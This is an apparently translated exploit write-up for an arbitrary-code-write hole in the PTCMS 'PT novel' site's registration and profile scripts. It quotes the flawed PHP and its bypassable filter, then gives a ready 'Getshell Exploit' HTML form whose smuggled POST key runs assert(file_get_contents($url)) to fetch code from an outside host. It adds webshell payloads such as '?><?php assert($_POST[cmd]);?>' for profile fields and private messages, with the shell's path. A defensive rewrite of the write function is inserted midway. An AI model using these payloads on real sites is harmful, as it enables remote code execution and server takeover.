PTCMS PT novel thief (PTNovelSteal) arbitrary code write 0-day and fix

Source: Internet
Author: User

This affects all versions of the PT novel system. The patch has been released officially! (Fuck!)
 
Let's get started with the text below.
This program does not use a database; all user information is stored in the /data/user directory.
A folder is created for each user name, and the registration parameters and user information are written into that folder.
 
The other files need not be read because they are all similar, so we only look at one representative:
/user/reg4.php
if (isset($_POST['dosubmit'])) {
    unset($_POST['dosubmit']);
} else {
    echo "<script>alert('Incorrect route!');location.href='reg.php';</script>";
    exit();
}

include '../inc/global.php';
include '../data/user.php';
$username = $_POST['username'];

// Write data
$str = '<?php' . "\n";
foreach ($_POST as $key => $value) {
    $str .= "\$$key = '$value';\n";
}
$str .= "\$regdate = '" . date("Y-m-d") . "';\n";
$str .= "?>";
$file = '../data/user/' . $username . '/info.php';
$result = $pt->writeto($file, $str);
...... Omitted
The code above keeps only the most critical part. Then we see our lovely foreach:
it passes every POST key and value straight into the writeto function. Let's check that code in
common.class.php:
// Generate html
function writeto($filePath, $content) {
    pt::createdir(dirname($filePath));
    $pt_html = fopen($filePath, 'w');
    flock($pt_html, LOCK_EX);
    $result = fwrite($pt_html, $content);
    fclose($pt_html);
    return $result;
}

// Generate a directory
function createdir($dir) {
    if (strpos('\\', $dir)) {
        $dir = str_replace('\\', '/', $dir);
    }
    $edir = explode("/", $dir);
    for ($i = 0; $i < count($edir); $i++) {
        $edirm = $edir[0];
        for ($ii = 1; $ii <= $i; $ii++) {
            $edirm = $edirm . '/' . $edir[$ii];
        }
        if (file_exists($edirm) && is_dir($edirm)) {
            // already exists, nothing to do
        } else {
            @mkdir($edirm, 0777);
        }
    }
}
Amazing: it writes the PHP file directly. OK, let's look at how it is used.
First, the path: this file has no related filter function at all! So let's look at the file it includes,
global.php:
// Prevent invalid POST
if (!empty($_REQUEST)) {
    $value = implode("", $_REQUEST);
    // The official patch added a keyword here; of course the vendor never noticed that this check can be bypassed.
    if (preg_match("/\{|\}|fputs|fopen|base64|eval/i", $value)) {
        exit('Invalid operation');
    }
}
Unrelated code omitted. We can see that the global filter is simple and easy to bypass: implode() only joins the request values, so the POST keys are never inspected, and assert is not on the keyword list anyway.
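As an added defensive example (not PTCMS code and not the author's), here is how the reg4.php write should have been done: validate the user name before it becomes a directory name, accept only a fixed list of fields instead of looping over every POST key, and serialise the data with var_export so no submitted key or value can turn into PHP code. The field list, the storage path and the function names are assumptions.

```php
<?php
// Added example, not PTCMS code. Assumption: the profile still lives at
// ../data/user/<name>/info.php and is loaded with include, so it is written
// as a PHP file that returns an array instead of a list of assignments.

const ALLOWED_FIELDS = ['username', 'password', 'email', 'qq']; // assumed field set

function build_user_info(array $post): string {
    // 1. The user name becomes a directory component: allow only a safe charset,
    //    which also rules out "../" traversal.
    if (!isset($post['username']) || !preg_match('/^[A-Za-z0-9_]{3,20}$/', $post['username'])) {
        throw new InvalidArgumentException('invalid username');
    }
    // 2. Whitelist keys instead of iterating over $_POST; a hostile key such as
    //    "exp;assert(...);//" is never looked at, so no blacklist regex is needed.
    $data = [];
    foreach (ALLOWED_FIELDS as $field) {
        if (isset($post[$field]) && is_string($post[$field])) {
            $data[$field] = $post[$field];
        }
    }
    $data['regdate'] = date('Y-m-d');
    // 3. var_export escapes quotes and backslashes, so a value like
    //    "'?><?php ... ?>" stays inside a string literal and is never executed.
    return "<?php\nreturn " . var_export($data, true) . ";\n";
}

function save_user_info(string $baseDir, array $post): string {
    $content = build_user_info($post);          // validates before touching the disk
    $dir = $baseDir . '/' . $post['username'];
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) { // no world-writable 0777
        throw new RuntimeException('cannot create user directory');
    }
    $file = $dir . '/info.php';
    if (file_put_contents($file, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $file;
}

// Constructed sample request carrying the hostile key and value from the write-up:
// the key is dropped by the whitelist, the value ends up as an escaped string.
$sample = [
    'username' => 'alice',
    'exp;assert(file_get_contents($url));//' => '',
    'email'    => "'?><?php assert(\$_POST[cmd]);?><?php'",
];
echo build_user_info($sample);
```

The generated file contains only `return array(...)` with the email stored as an escaped string literal, so including it yields data, not code.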
Let's take a look at my EXP!
<title>PT novel system Getshell Exploit by cfking</title>
<form id="QuickSearch" action="" method="post" name="QuickSearch" onsubmit="addaction();">
Target address: <input style="width:400;" type="text" name="doaction" value="http://localhost/user/reg4.php"/>
<input style="width:400;" type="hidden" name="dosubmit" value="test"/>
Registered account: <input style="width:400;" type="text" name="cfking" value="username"/>
Remote codes: <input style="width:400;" type="text" name="url" value="http://110.110.110.110/xx.txt"/>
<input style="width:400;" type="hidden" name="exp;assert(file_get_contents($url));//"/>
<input type="submit" name="QuickSearchBtn" value="submit" style="font-size:16px;"/>
</form>
<script type="text/javascript">
function addaction()
{
    document.QuickSearch.action = document.QuickSearch.doaction.value;
}
</script>
<hr><p>Tip: after the exploit succeeds, the shell path is /data/user/<username>/info.php! Roar!</p>
Put eval($_POST[cmd]) in the remote TXT file.
<p>
Another method is as follows:
After registering an account, insert the following where you modify your personal data:
'?><?php assert($_POST[cmd]);?><?php'

The shell path is /data/user/<username>/info.php.
However, this fails if magic_quotes_gpc is enabled. So next I will find another one!
Sending short messages: write the following as the title or content:
<?php assert($_POST[cmd]);?>
You can get it directly that way.
Address: pm.php


Patch officially released